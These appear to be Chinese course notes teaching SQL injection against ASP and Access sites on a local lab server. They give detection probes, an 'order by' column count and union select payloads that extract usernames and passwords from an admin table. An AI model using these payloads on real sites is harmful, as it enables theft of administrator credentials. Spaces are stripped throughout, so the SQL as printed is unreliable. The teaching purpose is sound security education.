授课内容:第二课_SQL注入之access篇
搭建组合
操作系统:windowslinux
搭建平台:iisapacheuginxtomcat
脚本格式:aspphpaspxjspcgiwarpypldojs
数据库:accessmysqlmssqloracledb2postsql
脚本数据库搭建平台操作系统
1.asp+access+iis+windows
2.php+mysql+apache+linux
3.php+mysql+apache+windows
4.php+mysql+iis+windows
5.aspx+sqlserver+iis+windows
6.asp+sqlserver+iis+windows
7.jsp+oracle+uginx+linuxwindows
脚本编程与数据库结合代码分析注入原理
网站域名:http://127.0.0.1:81/0/0/
文件目录:Productio
网站文件:PRODUCT_DETAIL.asp
文件参数名:id
文件参数值:1513
http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513
sql="selectfromproductwhereid="&id
selectfromproductwhereid=1513and1=1
sql注入原理:网站文件参数传递中未进行过滤,从而导致的恶意sql语句执行的结果。
初识asp+accesssql注入漏洞(联合查询法)
判断注入
''and1=1and1=2
and1=1页面正常
and1=22页面错误
数学逻辑运算符或且非
orandxor
真且真真
真且假假
真或假真
http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513
selectfromproductwhereid=1513
http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513and1=1
selectfromproductwhereid=1513and1=1
http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513and1=22
selectfromproductwhereid=1513and1=22
猜字段:orderby22
2.猜解表名
unionselect1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22fromadmin
3.猜解列名
unionselect1,2,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22fromadmin
4.猜解内容
http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513unionselect1,2,xxuser_name,4,5,6,7,8,9,10,11,12,13,14,xxpass_word,16,17,18,19,20,21,22fromadmin
分析注入中的产生条件
sql注入漏洞产生的条件:
1.是否有参数传递
2.是否参数带入数据库查询
3.是否sql语句被执行
几个例子+练习作业
搭建asp环境,搭建测试的源码
测试sql注入(asp+access)
3.尝试修改列名或表名再次猜解
总结:
问题1.access注入一定能猜解到表名或列名吗?
问题2.access注入表名或列名猜解不到怎么办?
www.xxx.com/ea_news.asp?id=1
www.xxx.com/ea_photo.asp?id=1
Ea_admin
|
|